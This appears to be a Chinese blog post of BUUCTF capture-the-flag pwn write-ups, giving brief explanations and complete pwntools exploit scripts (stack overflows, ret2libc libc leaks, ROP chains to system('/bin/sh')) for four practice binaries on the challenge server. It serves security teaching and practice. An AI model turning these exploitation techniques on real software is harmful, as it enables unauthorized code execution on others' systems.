PWN-PRACTICE-BUUCTF-4

最新推荐文章于 2022-05-07 09:35:40 发布
最新推荐文章于 2022-05-07 09:35:40 发布
阅读量113 收藏
点赞数
分类专栏: Pwn-BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/119417592
版权

PWN-PRACTICE-BUUCTF-4

ciscn_2019_en_2

这题和ciscn_2019_c_1一模一样
栈溢出ret2libc,encrypt函数里的异或运算不用管

from pwn import *
context.log_level="debug"
io=remote('node4.buuoj.cn',29289)
elf=ELF("./ciscn_2019_en_2")
libc=ELF("./libc-2.27-18-x64.so")
io.recvuntil("Input your choice!\n")
io.sendline("1")
io.recvuntil("Input your Plaintext to be encrypted\n")
pop_rdi_ret=0x0000000000400c83
puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
encrypt=0x00000000004009A0
ret=0x00000000004006b9
payload="a"*(48+32+8)+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(encrypt)
io.sendline(payload)
io.recvuntil("Ciphertext\n")
io.recvuntil("\n")
puts_addr=u64(io.recvuntil("\n",drop=True).ljust(8,"\x00"))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym["puts"]
system=libc_base+libc.sym["system"]
binsh=libc_base+libc.search("/bin/sh").next()
payload_2="a"*(48+32+8)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system)+p64(encrypt)
io.recvuntil("Input your Plaintext to be encrypted\n")
io.sendline(payload_2)
io.sendline("cat flag")
io.interactive()

bjdctf_2020_babystack

输入要读取数据的长度,然后读取数据到buf
将要读取数据的长度设置为一个较大的值,读取到buf,构成栈溢出,覆盖rip到backdoor

from pwn import *
io=remote('node4.buuoj.cn',25272)
io.recvuntil("\n")
io.sendline("50")
io.recvuntil("u name?\n")
backdoor=0x00000000004006E6
payload="a"*(16+8)+p64(backdoor)
io.sendline(payload)
io.sendline("cat flag")
io.interactive()

not_the_same_3dsctf_2016

main函数中gets可造成栈溢出,覆盖eip到get_secret
读取flag到fl4g,是bss段上某处
not2016-secret
题目是静态编译的可执行文件,包含了write,exit等函数,利用write函数将flag打印出来

from pwn import *
#context.log_level="debug"
io=remote('node4.buuoj.cn',28714)
elf=ELF('./not_the_same_3dsctf_2016')
get_secret=0x080489A0
write=elf.sym['write']
exit=elf.sym['exit']
flag=0x080ECA2D
payload="a"*45+p32(get_secret)+p32(write)+p32(exit)+p32(1)+p32(flag)+p32(45)
io.sendline(payload)
io.interactive()

[HarekazeCTF2019]baby_rop

简单的栈溢出,程序包含了字符串"/bin/sh\x00"
先覆盖rip到一个pop rdi,将"/bin/sh\x00"弹到rdi,再执行system,这题的flag在/home/babyrop/flag

from pwn import *
#context.log_level="debug"
io=remote('node4.buuoj.cn',25416)
elf=ELF('./babyrop')
io.recvuntil("name? ")
pop_rdi_ret=0x0000000000400683
ret=0x0000000000400479
system=elf.plt['system']
main=0x00000000004005D6
binsh=0x0000000000601048
payload="a"*(16+8)+p64(pop_rdi_ret)+p64(binsh)+p64(ret)+p64(system)+p64(main)
io.sendline(payload)
io.sendline("cat /home/babyrop/flag")
io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF刷题系列
qq_45655564的博客
07-11 480
[HCTF 2018]WarmUp 查看网页源代码,得到source.php 可以得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
BUUCTF-PWN刷题记录-22
weixin_44145820的博客
05-18 665
目录ciscn_2019_n_2(double free) ciscn_2019_n_2(double free) delete的时候有一个double free漏洞 利用思路: 先用一个double free把0x602060(chunklist)申请出来,这样我们就能先修改里面的指针了,先利用GOT表泄露libc,然后写入__free_hook的地址并使用编辑写入system地址就行 Exp: from pwn import * menu = "Your choice: " def add(con
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 397
buuctf-pwn 001-016题wp
BUUCTF pwn actf_2019_anotherrepeater
stareforever的博客
01-18 1722
查看程序保护 保护基本都没开 查看程序流程 main函数,然后进入到input函数 input函数 先输入buf的大小,这里有整数溢出,可以控制buf的大小 输入-10,可以发现buf的大小是65526,并且打印出buf的地址 那么read(0,&buf,v6)就会发生栈溢出,所以可以考虑在buf里写入shellcode,然后再控制程序流返回到buf处即可, 栈溢出大小是0x41b 完整ex from pwn import * context(log_level='debug') #io
BUUCTF(PWN)suctf_2018_stack
半岛铁盒的博客
04-03 275
from pwn import * p = remote('node3.buuoj.cn',29039) ret_addr = 0x0400677 payload = 'a' * (0x20 + 8) + p64(ret_addr) p.send(payload) p.interactive() 不是676的原因是 这道题检查的其实是栈平衡的问题,因为是Ubuntu18,需要栈对齐 ...
[BUUCTF]PWN——picoctf_2018_got_shell
mcmuyanga的博客
01-22 355
picoctf_2018_got_shell 附件 步骤: 例行检查,32位程序,开启了nx 本地试运行一下,看看大概的情况,提示了两个地址 32位ida载入,检索字符串发现了后门,shell_addr=0x804854B main() 让我们将内容写入到我们选择的地址上。一开始想尝试溢出后来发现没有溢出漏洞 那么就根据程序的功能,将后门写入到puts@got上,这样在执行第16行的puts的时候我们就能获取shell了 完整exp from pwn import * r=remote('no
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
pwn-200题目文件
02-16
pwn-200题目文件
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop
mcmuyanga的博客
09-01 687
[BUUCTF]PWN17——[HarekazeCTF2019]baby_rop 附件 步骤: 例行检查,64位,开启了NX保护 试运行一下程序,看这个情况,当我们输入太长字符串的时候会报错 64位ida载入,shift+f12查看程序里的字符串,看到了system 和 ‘/bin/sh’ 双击跟进,ctrl+x查看一下哪里调用了字符串,没有找到函数,只找到了地址 shell=0x601048 system=0x400496 找到输入点,没有限制v4读入的数据,可以造成溢出,跟pwn16差不
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1518
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 265
buuctf-pwn 017-026题wp,重点关注babyheap
buuoj pwn get_started_3dsctf_2016 ret2syscall
yongbaoii的博客
01-29 356
这里记录的是ret2syscall时候出的一些状况,详细的完整版在下面链接 from pwn import * r = process('./2016') elf=ELF('./2016') context.log_level = "debug" bss=0x080eb000 pop_ebx_esi_edi_ret=0x080509a5 syscall_addr = 0x0806357d pop_eax = 0x080b91e6 bss_addr = 0x080eb000 #gdb.attach(r)
BUUCTF-pwn(3)
njh18790816639的博客
11-10 689
[HarekazeCTF2019]baby_rop 该题还是比较简单的,没有什么难点!先探测一波保护! 并且还发现了字符串! 然后我们就可以开始构造payload了! payload = b’a’*(0x10+0x8)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr) jarvisoj_level2_x64 这道题目过于简单,所以就不再分析了,直接上脚本! from pwn import * context(log_level='debug',os='linu
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 1883
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
[BUUCTF-pwn]——jarvisoj_level1
Y_peak的博客
03-17 404
[BUUCTF-pwn]——jarvisoj_level1 题目地址:https://buuoj.cn/challenges#jarvisoj_level1 第一种直接构造shellcode writeup 第二种泄露libc进行操作 from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = E
PWN-PRACTICE-BUUCTF-12
P1umH0的博客
08-08 137
PWN-PRACTICE-BUUCTF-12cmcc_simpleroppicoctf_2018_buffer overflow 2babyfengshui_33c3_2016xdctf2015_pwn200 cmcc_simplerop 静态编译的32位elf,找一个"int 80h"执行系统调用 前提是利用栈溢出读入字符串"/bin/sh\x00",然后找pop给寄存器赋值,最后"int 80h" from pwn import * io = remote('node4.buuoj.cn',27587)
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值